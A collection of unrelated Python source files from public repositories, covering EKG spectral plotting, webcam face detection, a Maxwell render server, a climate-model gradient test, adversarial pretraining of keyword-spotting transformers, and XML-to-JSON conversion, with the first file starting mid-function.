            ax.margins(x=0)
            # show microseconds for mouse-over
            ax.format_xdata = lambda d: mdates.num2date(d).strftime('%H:%M:%S.%f')[:-3]
    else:
        # single panel: EKG trace only (axs is a single Axes, not an array)
        for dat, plot in zip(data, plots):
            if plot == 'ekg' and rpeaks == True:
                axs.plot(dat, zorder = 1)
                axs.scatter(self.rpeaks.index, self.rpeaks.values, color='red', zorder = 2)
                axs.set_ylabel('EKG (mV)')
                axs.set_xlabel('Time')
            axs.margins(x=0)
            # show microseconds for mouse-over
            axs.format_xdata = lambda d: mdates.num2date(d).strftime('%H:%M:%S.%f')[:-3]
def generate_welch(self, method='welch', dB=False, bands=True, save=True, savedir=None):
    """
    Plot the welch power spectrum, optionally colored by frequency band,
    and save it.

    Parameters
    ----------
    method : str, default 'welch'
        Kept for interface compatibility; this plot always uses
        self.psd_welch.
    dB : bool, default False
        If True, plot power spectral density in decibels instead of s^2/Hz.
    bands : bool, default True
        If True, fill the spectrum colored by frequency band.
    save : bool, default True
        If True, save the figure as well as plotting it.
    savedir : str, optional
        Path to directory where the figure is to be saved.

    Returns
    -------
    fig : figure
        The power spectrum figure.

    See Also
    --------
    EKG.calc_psd_welch : Calculate welch power spectrum.
    """
    # set title
    title = self.metadata['file_info']['in_num'] + ' ' + self.metadata['file_info']['start_date'] + '\n' + self.metadata['file_info']['sleep_stage'] + ' ' + self.metadata['file_info']['cycle']
    # append the epoch when present. The previous code referenced an
    # undefined name `n` inside a bare try/except, so the epoch was
    # silently never appended.
    if 'epoch' in self.metadata['file_info']:
        title = title + ' ' + self.metadata['file_info']['epoch']

    # set data to plot
    psd = self.psd_welch

    # transform units
    if dB == True:
        pwr = 10 * np.log10(psd['pwr'])
        ylabel = 'Power spectral density (dB)'
    else:
        pwr = psd['pwr']/1e6 # convert from ms^2/Hz to s^2/Hz
        ylabel = 'Power spectral density (s^2/Hz)'

    fig, ax = plt.subplots()

    # plot just spectrum
    if bands == False:
        ax.plot(psd['freqs'], pwr)
    # or plot spectrum colored by frequency band
    elif bands == True:
        ax.plot(psd['freqs'], pwr, color='black', zorder=10)
        colors = [None, 'yellow', 'darkorange', 'tomato']
        zdict = {0:0.6, 1:0.6, 2:0.4, 3:0.6}
        for (zord, alpha), (key, value), color in zip(zdict.items(), self.psd_fband_vals.items(), colors):
            if value['idx'] is not None:
                # get band edges back out of the stored freq_range string
                xrange = [float(x) for x in self.freq_stats[key]['freq_range'][1:-1].split(",")]
                # fill spectra by band (from band start onward; later bands
                # overlay earlier ones via zorder)
                ax.fill_between(psd['freqs'], pwr, where = [xrange[0] <= x for x in psd['freqs']],
                                facecolor=color, alpha=alpha, zorder=zord)

    ax.set_xlim(0, 0.4)
    ax.margins(y=0)
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    plt.xlabel('Frequency (Hz)')
    plt.ylabel(ylabel)
    plt.suptitle(title)

    if save == True:
        if savedir is None:
            print('ERROR: File not saved. Please specify savedir argument.')
        else:
            savename = os.path.join(savedir, self.metadata['file_info']['fname'].split('.')[0]) + '_psd.png'
            fig.savefig(savename, dpi=300)
    return fig
    def generate_PS(self, denoised = True, confidence = 'bootstrapping'):
        """
        Generate a multitaper power spectrum of the NN series with confidence levels.

        Parameters
        ----------
        denoised : bool, default True
            If True, denoise the multitaper estimate of the power spectral density.
        confidence : str {'bootstrapping', 'chi sq'}
            Method with which to determine the confidence intervals.

        See Also
        ---------
        EKG.data_pre_processing : Load data to the workspace and perform pre-processing.
        EKG.denoised_mt_spectral_estimation : Peform expectation maximization to estimate the denoised Eigen coefficients and denoised Multitaper spectral estimates.
        EKG.direct_mt_spectral_estimation : Produce the classical multitaper estimate of the Power Spectral Density.
        EKG.plot_estimates : Create figure containing the final PSD estimates with the confidence levels.
        """
        # Main task 1. Load data into the workspace and specify the parameters - pre processing
        # Specify the desired sampling frequency of the time series in Hz
        fs = 4
        # Extract the interpolated and zero centered NN time series
        NN_intervals_interpolated, K = self.data_pre_processing(fs)
        # NOTE(review): this immediately overwrites the K returned above with the
        # series length — confirm data_pre_processing's K is intentionally discarded.
        K = NN_intervals_interpolated.shape[0]
        # Set the parameters required for Spectral analysis - multi tapering
        N = 512 # Number of frequency bins considered in the frequency interval [0,fs/2). This determines the frequency spacing.
        NW = 2 # time half-bandwidth product of Multitapering
        no_of_tapers = 3 # the number of tapers considered for Multitapering
        # Set the parameters required for Confidence Intervals
        CI = 0.95 # Specify the Required Confidence levels
        bootstrapping_repeats = 5000 # Specify the number of bootstrap samples
        scaling_fac = (1/fs)*(K / N) # Final scaling factor of the PSD estimates
        freq_vector = np.arange(0.0, 0.5*fs, 0.5*fs/N)
        multi_tapering_spectral_resolution = NW*fs/K
        if denoised==True:
            denoised_MT_est, denoised_w_est_tapers = self.denoised_mt_spectral_estimation(NN_intervals_interpolated, N, NW, no_of_tapers,K, fs)
            # Multiply by the required scaling factors to get the final spectral estimates
            denoised_MT_est_final = scaling_fac*denoised_MT_est;
            if confidence == "bootstrapping":
                denoised_MT_est_Lower_confidence_bootstrap, denoised_MT_est_Upper_confidence_bootstrap = self.confidence_intervals_bootstrapping(denoised_MT_est, denoised_w_est_tapers, CI, bootstrapping_repeats, fs, K, N)
                fig = self.plot_estimates(denoised_MT_est_final, denoised_MT_est_Lower_confidence_bootstrap, denoised_MT_est_Upper_confidence_bootstrap, fs)
                plt.title('Denoised Multitaper Spectral Estimate: with %d%% Confidence Intervals - Bootstrapping'% (CI*100),fontdict = {'fontsize' : 16})
            if confidence == "chi sq":
                denoised_MT_est_Lower_confidence_Chi_squared, denoised_MT_est_Upper_confidence_Chi_squared = self.confidence_intervals_chi_squared(denoised_MT_est_final, CI, no_of_tapers, N)
                fig = self.plot_estimates(denoised_MT_est_final, denoised_MT_est_Lower_confidence_Chi_squared, denoised_MT_est_Upper_confidence_Chi_squared, fs)
                plt.title('Denoised Multitaper Spectral Estimate: with %d%% Confidence Intervals - Chi - squared test'% (CI*100),fontdict = {'fontsize' : 16})
        if denoised==False:
            direct_MT_est, direct_w_est_tapers = self.direct_mt_spectral_estimation(NN_intervals_interpolated, N, NW, no_of_tapers, fs)
            # Multiply by the required scaling factors to get the final spectral estimates
            direct_MT_est_final = scaling_fac*direct_MT_est
            if confidence == 'bootstrapping':
                direct_MT_est_Lower_confidence_bootstrap, direct_MT_est_Upper_confidence_bootstrap = self.confidence_intervals_bootstrapping(direct_MT_est, direct_w_est_tapers, CI, bootstrapping_repeats, fs, K, N)
                fig = self.plot_estimates(direct_MT_est_final, direct_MT_est_Lower_confidence_bootstrap, direct_MT_est_Upper_confidence_bootstrap, fs)
                plt.title('Direct Multitaper Spectral Estimate: with %d%% Confidence Intervals - Bootstrapping'% (CI*100),fontdict = {'fontsize' : 16})
            if confidence == 'chi sq':
                direct_MT_est_Lower_confidence_Chi_squared, direct_MT_est_Upper_confidence_Chi_squared = self.confidence_intervals_chi_squared(direct_MT_est_final, CI, no_of_tapers, N)
                fig = self.plot_estimates(direct_MT_est_final, direct_MT_est_Lower_confidence_Chi_squared, direct_MT_est_Upper_confidence_Chi_squared, fs)
                plt.title('Direct Multitaper Spectral Estimate: with %d%% Confidence Intervals - Chi - squared test'% (CI*100),fontdict = {'fontsize' : 16})
        plt.xlabel("frequency ($Hz$)")
        plt.show()
        # plt.xlim([np.min(freq_vector), np.max(freq_vector)])
| CardioPy/CardioPy | cardiopy/ekg.py | ekg.py | py | 87,636 | python | en | code | 7 | github-code | 36 |
41907884718 | import time
import cv2
import mediapipe as mp
# Shorthand for MediaPipe's face-detection solution module.
mp_face_detection = mp.solutions.face_detection
import os
# Force OpenCV's FFmpeg backend to use UDP transport for RTSP capture.
os.environ['OPENCV_FFMPEG_CAPTURE_OPTIONS'] = 'rtsp_transport;udp'
class face_detection:
    """Grabs frames from a camera and blocks until a face is detected."""

    def __init__(self):
        # RTSP URL kept for reference; capture currently uses local device 0.
        self.URL = "rtsp://192.168.0.22:8554/"
        self.cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
        self.image = None
        self.device = 0
        self.width = 960
        self.height = 540

    def detect_face(self):
        """Block until a frame containing a face is captured.

        The frame is saved to ``face.jpg``, the capture device is released,
        and True is returned.
        """
        cap = self.cap
        cap.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)
        cap.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)
        # Create the detector once instead of once per frame (construction is
        # costly); also avoids shadowing the class name inside the loop.
        with mp_face_detection.FaceDetection(model_selection=1, min_detection_confidence=1) as detector:
            while True:
                ret, frame = cap.read()
                if not ret:
                    # Camera read failed (frame is None) — previously this
                    # crashed in cvtColor; retry instead.
                    continue
                self.image = frame
                results = detector.process(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
                if results.detections:  # face detected -> persist frame, return True
                    cv2.imwrite("face.jpg", frame)
                    cap.release()
                    return True
if __name__ == '__main__':
    fd = face_detection()
    # Block until a face shows up on the camera, then trigger the follow-up steps.
    if fd.detect_face():
        os.system("F3.bat")
        time.sleep(2);
        print("2초간 사람 인식 완료")
        # Run the age-prediction model on the captured frame.
        os.system('python ./age_prediction_model/age_pred.py')
| CSID-DGU/2022-2-SCS4031-EZ_SW | FaceDetection.py | FaceDetection.py | py | 1,175 | python | en | code | 0 | github-code | 36 |
34118610496 | import os
from flask import Flask
import ghhops_server as hs
import rhino3dm
import pymaxwell5 as pym
# Serve the Hops components through a Flask app
# (the commented line below is the standalone-HTTP alternative).
app = Flask(__name__) #flask
hops = hs.Hops(app) #flask
#hops = hs.Hops() #http
@hops.component(
    "/maxwell",
    name="Maxwell",
    description="render",
    icon="C://Users//archi//Dropbox//course//maxwell.png",
    inputs=[
        hs.HopsBoolean("run","run","render scene"),
        hs.HopsString("width","width",""),
        hs.HopsString("height","height",""),
        hs.HopsString("time","time",""),
        hs.HopsString("sl","sl",""),
        hs.HopsString("img","img",""),
        hs.HopsString("mxi","mxi",""),
        hs.HopsString("mxs_file","inPath",""),
        hs.HopsString("output_folder","outFolder",""),
    ],
    outputs=[
        hs.HopsString('image','image','')
    ]
)
def maxwell(run,width,height,time,sl,img,mxi,inPath, outFolder):
    """Hops component: render the scene when `run` is True.

    When `run` is False, skip rendering and return the path the image
    would have (outFolder concatenated with img).
    """
    if run:
        return run_maxwell_render(width,height,time,sl,img,mxi,inPath, outFolder)
    else:
        return outFolder + img
def run_maxwell_render(width,height,time,sl,img,mxi,inPath, outFolder):
    """Invoke the Maxwell command-line renderer and return the output image path.

    Args:
        width, height: Output resolution in pixels (strings).
        time: Maximum render time.
        sl: Target sampling level.
        img: Output image file name (appended to outFolder).
        mxi: Output .mxi file name (appended to outFolder).
        inPath: Path to the input .mxs scene file.
        outFolder: Output directory, created if missing.
            NOTE(review): paths are built by plain string concatenation, so
            outFolder is expected to end with a separator — confirm callers.

    Returns:
        The concatenated path of the rendered image.
    """
    # makedirs(exist_ok=True) also creates missing parent directories and
    # avoids the check-then-create race that os.path.exists + os.mkdir had.
    os.makedirs(outFolder, exist_ok=True)
    parameters = [
        '-mxs:' + inPath,
        '-o:' + outFolder + img,
        '-mxi:' + outFolder + mxi,
        '-res:' + width + 'x' + height,
        '-time:' + time,
        '-sl:' + sl,
        # '-nowait',
        '-nomxi:off',
        '-noimage:off',
    ]
    pym.runMaxwell(parameters)
    return outFolder + img
# Start the Flask development server when run as a script.
if __name__ == "__main__":
    app.run() #flask
#hops.start(debug=True) #http
| seghier/maxwell | venv/maxwell.py | maxwell.py | py | 1,679 | python | en | code | 0 | github-code | 36 |
21334762187 | import unittest
import numpy as np
import pandas as pd
from os.path import join, dirname
from pandas import DataFrame, read_csv
from sostrades_core.execution_engine.execution_engine import ExecutionEngine
from sostrades_core.tests.core.abstract_jacobian_unit_test import AbstractJacobianUnittest
class GHGEmissionsJacobianDiscTest(AbstractJacobianUnittest):
    """Analytic-gradient checks for the agriculture GHG emissions discipline."""
    #AbstractJacobianUnittest.DUMP_JACOBIAN = True

    def setUp(self):
        # Fresh execution engine per test, namespaced under 'Test'.
        self.name = 'Test'
        self.ee = ExecutionEngine(self.name)

    def analytic_grad_entry(self):
        # Entry points the AbstractJacobianUnittest harness will run.
        return [
            self.test_carbon_emissions_analytic_grad
        ]

    def test_carbon_emissions_analytic_grad(self):
        """Check the discipline's analytic Jacobian against complex-step FD."""
        self.model_name = 'agriculture_emissions'
        # All namespaces resolve to the study root.
        ns_dict = {'ns_witness': f'{self.name}',
                   'ns_public': f'{self.name}',
                   'ns_agriculture': f'{self.name}',
                   'ns_ref': f'{self.name}',
                   }
        self.ee.ns_manager.add_ns_def(ns_dict)
        mod_path = 'climateeconomics.sos_wrapping.sos_wrapping_emissions.agriculture_emissions.agriculture_emissions_discipline.AgricultureEmissionsDiscipline'
        builder = self.ee.factory.get_builder_from_module(
            self.model_name, mod_path)
        self.ee.factory.set_builders_to_coupling_builder(builder)
        self.ee.configure()
        self.ee.display_treeview_nodes()
        # Synthetic linear emission trajectories over 2020-2100.
        year_start = 2020
        year_end = 2100
        years = np.arange(year_start, year_end + 1)
        CO2_land_emissions = pd.DataFrame({'years': years,
                                           'emitted_CO2_evol_cumulative': np.linspace(0., 0.7, len(years))})
        N2O_land_emissions = pd.DataFrame({'years': years,
                                           'emitted_N2O_evol_cumulative': np.linspace(0., 0.4, len(years)),
                                           })
        CH4_land_emissions = pd.DataFrame({'years': years,
                                           'emitted_CH4_evol_cumulative': np.linspace(0., 0.5, len(years)),
                                           })
        values_dict = {f'{self.name}.year_start': year_start,
                       f'{self.name}.year_end': year_end,
                       f'{self.name}.technologies_list': ['Crop', 'Forest'],
                       f'{self.name}.Crop.CO2_land_emission_df': CO2_land_emissions,
                       f'{self.name}.Forest.CO2_land_emission_df': CO2_land_emissions,
                       f'{self.name}.Crop.CH4_land_emission_df': CH4_land_emissions,
                       f'{self.name}.Crop.N2O_land_emission_df': N2O_land_emissions,
                       }
        self.ee.load_study_from_input_dict(values_dict)
        self.ee.execute()
        disc_techno = self.ee.root_process.proxy_disciplines[0].mdo_discipline_wrapp.mdo_discipline
        # Compare analytic vs complex-step Jacobian (reference stored as pickle).
        self.check_jacobian(location=dirname(__file__), filename=f'jacobian_agriculture_ghg_emission_discipline.pkl',
                            discipline=disc_techno, step=1e-15, derr_approx='complex_step', local_data = disc_techno.local_data,
                            inputs=[f'{self.name}.Crop.CO2_land_emission_df',
                                    f'{self.name}.Forest.CO2_land_emission_df',
                                    f'{self.name}.Crop.CH4_land_emission_df',
                                    f'{self.name}.Crop.N2O_land_emission_df'],
                            outputs=[f'{self.name}.CO2_land_emissions',
                                     f'{self.name}.CH4_land_emissions',
                                     f'{self.name}.N2O_land_emissions'
                                     ])
| os-climate/witness-core | climateeconomics/tests/l1_test_gradient_agriculture_ghgemissions_discipline.py | l1_test_gradient_agriculture_ghgemissions_discipline.py | py | 3,649 | python | en | code | 7 | github-code | 36 |
2876716401 | from argparse import ArgumentParser
from config_parser import get_config
import os
import yaml
import matplotlib.pyplot as plt
import time
import torch
from torch import nn, optim
import wandb
from typing import Callable, Tuple
from utils.loss import LabelSmoothingLoss
from utils.opt import get_optimizer, get_adversarial_optimizer
from utils.scheduler import WarmUpLR, get_scheduler
from utils.trainer import train, evaluate, evaluate_sliding_window, train_single_batch
from utils.dataset import get_loader, get_noisy_loader
from utils.misc import seed_everything, count_params, get_model, calc_step, log
#from data2vec.data2vec_utils.trainer import train_single_batch
from utils.misc import log, save_model
from torch.utils.data import DataLoader
from data2vec.masking import AudioMaskingGenerator
from models.Data2Vec import Data2Vec
from tqdm import tqdm
import copy
from collections import OrderedDict
import data2vec.data2vec_utils.trainer
import utils.trainer
def adv_pretrain(config_kwt, config_d2v, k, alpha):
    """Adversarial pretraining with noisy data.

    Each batch alternates a "friendly" data2vec masked-prediction step and an
    "adversarial" KWT noise-type-prediction step; the first k transformer
    layers are copied back and forth between the two models so they share them.

    Args:
        config_kwt (dict): Keyword transformer config for noise type prediction
        config_d2v (dict): Data2vec config for masked prediction (regression)
        k (int): Lower K common layers that the two models share.
        alpha: Passed to get_adversarial_optimizer — presumably a scaling
            factor for the shared layers' updates; TODO confirm.
    """
    ######################################
    # save hyperparameters for current run
    ######################################
    config_kwt["exp"]["save_dir"] = os.path.join(config_kwt["exp"]["exp_dir"], config_kwt["exp"]["exp_name"])
    os.makedirs(config_kwt["exp"]["save_dir"], exist_ok=True)
    # NOTE(review): single-argument os.path.join — exp_dir looks omitted here;
    # the d2v save_dir is recomputed (with exp_dir) further below anyway.
    config_d2v["exp"]["save_dir"] = os.path.join(config_d2v["exp"]["exp_name"])
    os.makedirs(config_d2v["exp"]["save_dir"], exist_ok=True)
    config_str = yaml.dump(config_kwt)
    print("Using settings:\n", config_str)
    with open(os.path.join(config_kwt["exp"]["save_dir"], "settings.txt"), "w+") as f:
        f.write(config_str)
    ######################################
    # data loaders
    ######################################
    # training
    # adversarial (noisy) training set
    print("Loading adversarial training dataset...")
    with open(config_kwt["train_list_file"], "r") as f:
        train_lista = f.read().rstrip().split("\n")
    trainloadera = get_noisy_loader(train_lista, config_kwt, train=True)
    # friendly (clean) training set
    print("Loading friendly training dataset...")
    with open(config_d2v["train_list_file"], "r") as f:
        train_listf = f.read().rstrip().split("\n")
    trainloaderf = get_loader(train_listf, config_d2v, train=True)
    # validation
    # adversarial
    print("Loading adversarial validation dataset...")
    with open(config_kwt["val_list_file"], "r") as f:
        val_lista = f.read().rstrip().split("\n")
    valloadera = get_noisy_loader(val_lista, config_kwt, train=False)
    # friendly
    print("Loading friendly validation dataset...")
    with open(config_d2v["val_list_file"], "r") as f:
        val_listf = f.read().rstrip().split("\n")
    valloaderf = get_loader(val_listf, config_d2v, train=False)
    # Mask generator used for the data2vec masked-prediction objective.
    mask_generator = AudioMaskingGenerator(mask_prob=config_d2v["hparams"]["model"]["mask_prob"],
                                           mask_length=config_d2v["hparams"]["model"]["mask_length"],
                                           attention_mask=None,
                                           min_masks=config_d2v["hparams"]["model"]["min_masks"])
    ######################################
    # models
    ######################################
    # KWT model
    model_kwt = get_model(config_kwt["hparams"]["model"])
    model_kwt = model_kwt.to(config_kwt["hparams"]["device"])
    # A deep copy of the KWT serves as the data2vec encoder.
    model_kwt_copy = copy.deepcopy(model_kwt)
    # data2vec model
    model_d2v = Data2Vec(encoder=model_kwt_copy,
                         modality=config_d2v["modality"],
                         model_embed_dim=config_d2v["hparams"]["model"]["dim"],
                         ema_decay=config_d2v["hparams"]["model"]["ema_decay"],
                         ema_end_decay=config_d2v["hparams"]["model"]["ema_end_decay"],
                         ema_anneal_end_step=config_d2v["hparams"]["model"]["ema_anneal_end_step"],
                         average_top_k_layers=config_d2v["hparams"]["model"]["average_top_k_layers"],
                         normalize_targets=config_d2v["hparams"]["model"]["normalize_targets"])
    model_d2v = model_d2v.to(config_d2v["hparams"]["device"])
    criterion_kwt = nn.CrossEntropyLoss()
    criterion_d2v = nn.MSELoss(reduction="none")
    # NOTE(review): parameters_kwt is never used (the KWT optimizer takes the
    # model itself); kept as in the original.
    parameters_kwt = model_kwt.parameters()
    parameters_d2v = model_d2v.parameters()
    # optimizer for KWT
    optimizer_kwt = get_adversarial_optimizer(model_kwt, config_kwt["hparams"]["optimizer"], k, alpha)
    # optimizer for data2vec
    optimizer_d2v = optim.Adam(parameters_d2v, lr=config_d2v["hparams"]["optimizer"]["opt_kwargs"]["lr"],
                               betas=config_d2v["hparams"]["optimizer"]["opt_kwargs"]["betas"],
                               eps=config_d2v["hparams"]["optimizer"]["opt_kwargs"]["eps"],
                               weight_decay=config_d2v["hparams"]["optimizer"]["opt_kwargs"]["weight_decay"])
    #for group in optimizer_kwt.param_groups:
    #    print(group['lr'])
    #return
    # Learning rate scheduler for data2vec
    epochs = config_d2v["hparams"]["n_epochs"]
    steps_per_epoch = len(trainloaderf)
    lr_scheduler = optim.lr_scheduler.OneCycleLR(
        optimizer_d2v,
        max_lr=config_d2v["hparams"]["optimizer"]["opt_kwargs"]["lr"],
        epochs=epochs,
        steps_per_epoch=steps_per_epoch,
        anneal_strategy="cos")
    schedulers_d2v = {"scheduler": lr_scheduler,
                      "warmup": 0}
    # Learning rate scheduler for KWT
    schedulers_kwt = {
        "warmup": None,
        "scheduler": None
    }
    # Setting up the learning rate scheduler for data2vec and KWT.
    # NOTE(review): the d2v branches below wrap optimizer_kwt (not
    # optimizer_d2v) and may replace the OneCycleLR set above — confirm this
    # cross-wiring is intentional.
    if config_d2v["hparams"]["scheduler"]["n_warmup"]:
        schedulers_d2v["warmup"] = WarmUpLR(optimizer_kwt, total_iters=len(trainloaderf) * config_d2v["hparams"]["scheduler"]["n_warmup"])
    if config_d2v["hparams"]["scheduler"]["scheduler_type"] is not None:
        total_iters = len(trainloaderf) * max(1, (config_d2v["hparams"]["scheduler"]["max_epochs"] - config_d2v["hparams"]["scheduler"]["n_warmup"]))
        schedulers_d2v["scheduler"] = get_scheduler(optimizer_kwt, config_d2v["hparams"]["scheduler"]["scheduler_type"], total_iters)
    if config_kwt["hparams"]["scheduler"]["n_warmup"]:
        schedulers_kwt["warmup"] = WarmUpLR(optimizer_kwt, total_iters=len(trainloadera) * config_kwt["hparams"]["scheduler"]["n_warmup"])
    if config_kwt["hparams"]["scheduler"]["scheduler_type"] is not None:
        total_iters = len(trainloadera) * max(1, (config_kwt["hparams"]["scheduler"]["max_epochs"] - config_kwt["hparams"]["scheduler"]["n_warmup"]))
        schedulers_kwt["scheduler"] = get_scheduler(optimizer_kwt, config_kwt["hparams"]["scheduler"]["scheduler_type"], total_iters)
    # Saving directory for the data2vec model
    config_d2v["exp"]["save_dir"] = os.path.join(config_d2v["exp"]["exp_dir"], config_d2v["exp"]["exp_name"])
    os.makedirs(config_d2v["exp"]["save_dir"], exist_ok=True)
    ######################################
    # train models
    ######################################
    step = 0
    best_acc = 0.0
    device = config_d2v["hparams"]["device"]
    log_file = os.path.join(config_d2v["exp"]["exp_dir"], "training_log.txt")
    best_avg_loss = 0.0
    n_batches = len(trainloaderf)
    for epoch in range(config_d2v["hparams"]["n_epochs"]):
        t0 = time.time()
        running_loss_d2v = 0.0
        running_target_var_d2v = 0.0
        running_prediction_var_d2v = 0.0
        running_loss_kwt = 0.0
        correct_kwt = 0
        # One friendly batch and one adversarial batch per step; iteration
        # stops at the shorter of the two loaders (zip semantics).
        for (dataf, targetsf), (dataa, targetsa) in zip(trainloaderf, trainloadera):
            batch_size = dataf.size(dim=0)
            audio_length = dataf.size(dim=-1)
            ######################################
            # data2vec step - friendly step
            ######################################
            # masking (extra leading zero column accounts for the class token)
            mask = mask_generator(shape=(batch_size, audio_length)).to(device)
            mask = torch.cat([torch.zeros(batch_size, 1, device=mask.device), mask], dim=1).bool()
            # copy the first K transformer layers of KWT into the d2v encoder
            kwt_partial_state_dict = load_partial_state_dict(model_kwt.state_dict(), k)
            model_d2v.load_state_dict(kwt_partial_state_dict, strict=False)
            # train single batch
            loss_d2v, target_var_d2v, prediction_var_d2v = data2vec.data2vec_utils.trainer.train_single_batch(model_d2v, dataf, mask, optimizer_d2v, criterion_d2v, device)
            model_d2v.ema_step()
            running_loss_d2v += loss_d2v
            running_target_var_d2v += target_var_d2v
            running_prediction_var_d2v += prediction_var_d2v
            # learning rate scheduler
            if schedulers_d2v["warmup"] is not None and epoch < config_d2v["hparams"]["scheduler"]["n_warmup"]:
                schedulers_d2v["warmup"].step()
            elif schedulers_d2v["scheduler"] is not None:
                schedulers_d2v["scheduler"].step()
            # logging data2vec step
            if not step % config_d2v["exp"]["log_freq"]:
                log_dict = {"epoch": epoch, "loss": loss_d2v, "lr": optimizer_d2v.param_groups[0]["lr"],
                            "target_var": target_var_d2v, "prediction_var": prediction_var_d2v}
                log(log_dict, step, config_d2v)
            ######################################
            # kwt step - adversarial step
            ######################################
            # copy the first K layers of the d2v encoder back into KWT
            d2v_partial_state_dict = load_partial_state_dict(model_d2v.state_dict(), k)
            model_kwt.load_state_dict(d2v_partial_state_dict, strict=False)
            # train single batch
            loss_kwt, corr_kwt = utils.trainer.train_single_batch(model_kwt, dataa, targetsa, optimizer_kwt, criterion_kwt, device)
            running_loss_kwt += loss_kwt
            correct_kwt += corr_kwt
            if schedulers_kwt["warmup"] is not None and epoch < config_kwt["hparams"]["scheduler"]["n_warmup"]:
                schedulers_kwt["warmup"].step()
            elif schedulers_kwt["scheduler"] is not None:
                schedulers_kwt["scheduler"].step()
            # NOTE(review): this log_dict is built but never passed to log() —
            # looks like a missing log(log_dict, step, config_kwt) call.
            if not step % config_kwt["exp"]["log_freq"]:
                log_dict = {"epoch": epoch, "loss": loss_kwt, "lr": optimizer_kwt.param_groups[0]["lr"]}
            step += 1
        #################################################
        # epoch complete - log, validation and save model
        #################################################
        # data2vec log, validation and save model
        log_dict = {"epoch": epoch, "time_per_epoch": time.time() - t0,
                    "avg_train_target_var": running_target_var_d2v / n_batches,
                    "avg_train_prediction_var": running_prediction_var_d2v / n_batches,
                    "avg_loss_per_ep": running_loss_d2v / len(trainloaderf.dataset)}
        log(log_dict, step, config_d2v)
        if not epoch % config_d2v["exp"]["val_freq"]:
            avg_val_loss, avg_val_target_var, avg_val_prediction_var = data2vec.data2vec_utils.trainer.evaluate(model_d2v, mask_generator, criterion_d2v,
                                                                                                               valloaderf, device)
            log_dict = {"epoch": epoch, "val_loss": avg_val_loss,
                        "avg_val_target_var": avg_val_target_var, "avg_val_prediction_var": avg_val_prediction_var}
            #log(log_dict, step, config_d2v)
            # save best validation checkpoint (first eval epoch always saves)
            if avg_val_loss < best_avg_loss or epoch == config_d2v["exp"]["val_freq"]:
                best_avg_loss = avg_val_loss
                save_path = os.path.join(config_d2v["exp"]["save_dir"], "best.pth")
                save_model(epoch, avg_val_loss, save_path, model_d2v, optimizer_d2v, log_file)
                save_path = os.path.join(config_d2v["exp"]["save_dir"], "best_encoder.pth")
                save_model(epoch, avg_val_loss, save_path, model_d2v.encoder, optimizer_d2v, log_file)
        # kwt log, validation and save model
        log_dict = {"epoch": epoch, "time_per_epoch": time.time() - t0, "train_acc": correct_kwt/(len(trainloadera.dataset)), "avg_loss_per_ep": running_loss_kwt/len(trainloaderf)}
        log(log_dict, step, config_kwt)
        if not epoch % config_kwt["exp"]["val_freq"]:
            val_acc, avg_val_loss = utils.trainer.evaluate(model_kwt, criterion_kwt, valloadera, device)
            log_dict = {"epoch": epoch, "val_loss": avg_val_loss, "val_acc": val_acc}
            log(log_dict, step, config_kwt)
            # save best val ckpt
            if val_acc > best_acc:
                best_acc = val_acc
                save_path = os.path.join(config_kwt["exp"]["exp_dir"], "best.pth")
                save_model(epoch, val_acc, save_path, model_kwt, optimizer_kwt, log_file)
    # training complete
    # data2vec final evaluation
    avg_val_loss, avg_val_target_var, avg_val_prediction_var = data2vec.data2vec_utils.trainer.evaluate(model_d2v, mask_generator, criterion_d2v, valloaderf,
                                                                                                        device)
    log_dict = {"epoch": epoch, "val_loss": avg_val_loss,
                "avg_val_target_var": avg_val_target_var, "avg_val_prediction_var": avg_val_prediction_var}
    log(log_dict, step, config_d2v)
    # data2vec save final checkpoint
    save_path = os.path.join(config_d2v["exp"]["exp_dir"], "last.pth")
    save_model(epoch, avg_val_loss, save_path, model_d2v, optimizer_d2v, log_file)
    save_path = os.path.join(config_d2v["exp"]["exp_dir"], "last_encoder.pth")
    save_model(epoch, avg_val_loss, save_path, model_d2v.encoder, optimizer_d2v, log_file)
    # kwt final evaluation
    val_acc, avg_val_loss = evaluate(model_kwt, criterion_kwt, valloadera, device)
    log_dict = {"epoch": epoch, "val_loss": avg_val_loss, "val_acc": val_acc}
    log(log_dict, step, config_kwt)
    # kwt save final checkpoint
    save_path = os.path.join(config_kwt["exp"]["exp_dir"], "last.pth")
    save_model(epoch, val_acc, save_path, model_kwt, optimizer_kwt, log_file)
def load_partial_state_dict(state_dict, K):
    """Extract the parameters of the first K transformer layers.

    Only parameter names of the form ``transformer.<sub>.<layer_idx>...`` with
    ``layer_idx < K`` are kept; all other entries (embeddings, heads, etc.)
    are dropped. Intended for partial loading via load_state_dict(strict=False).

    Args:
        state_dict: Source state_dict (mapping of parameter name -> tensor).
        K: Number of leading transformer layers to keep.

    Returns:
        OrderedDict with the selected parameters, in original order.
    """
    custom_dict = OrderedDict()
    for param, value in state_dict.items():
        parts = param.split('.')
        # The layer index sits in the third name component
        # (e.g. "transformer.layers.3.attn.weight" -> 3).
        if parts[0] == "transformer" and int(parts[2]) < K:
            custom_dict[param] = value
    return custom_dict
def main(args):
    """Entry point: load both configs, seed the RNGs, and launch pretraining."""
    kwt_config = get_config(args.confk)
    d2v_config = get_config(args.confd)
    seed_everything(kwt_config['hparams']['seed'])
    # Adversarial scaling factor is fixed at 1 for these runs.
    alpha = 1
    adv_pretrain(kwt_config, d2v_config, args.k, alpha)
if __name__ == "__main__":
    # Command-line interface: both config files and the layer-sharing depth
    # are mandatory.
    parser = ArgumentParser("Adversarial pretraining")
    parser.add_argument("--confk", type=str, required=True, help="Path to config.yaml file for KWT.")
    parser.add_argument("--confd", type=str, required=True, help="Path to config.yaml file for data2vec.")
    parser.add_argument("--k", type=int, required=True, help="First K transformer layers to update")
    args = parser.parse_args()
main(args) | GregTheHunInDk/Robust_KWT | adv_pretrain.py | adv_pretrain.py | py | 16,336 | python | en | code | 0 | github-code | 36 |
10724474044 | import xmltodict
import json
# Loading and parsing the xml file.
with open (r'q1.xml', "r") as xml_file:
xml_data = xml_file.read()
print(xml_data)
# Convert xml to json
json_data = json.dumps(xmltodict.parse(xml_data), indent=4)
print(json_data)
with open("output.json", "w") as json_file:
json_file.write(json_data) | JonathanDabre/ip_ut2 | UT-2/xml/q4.py | q4.py | py | 338 | python | en | code | 1 | github-code | 36 |
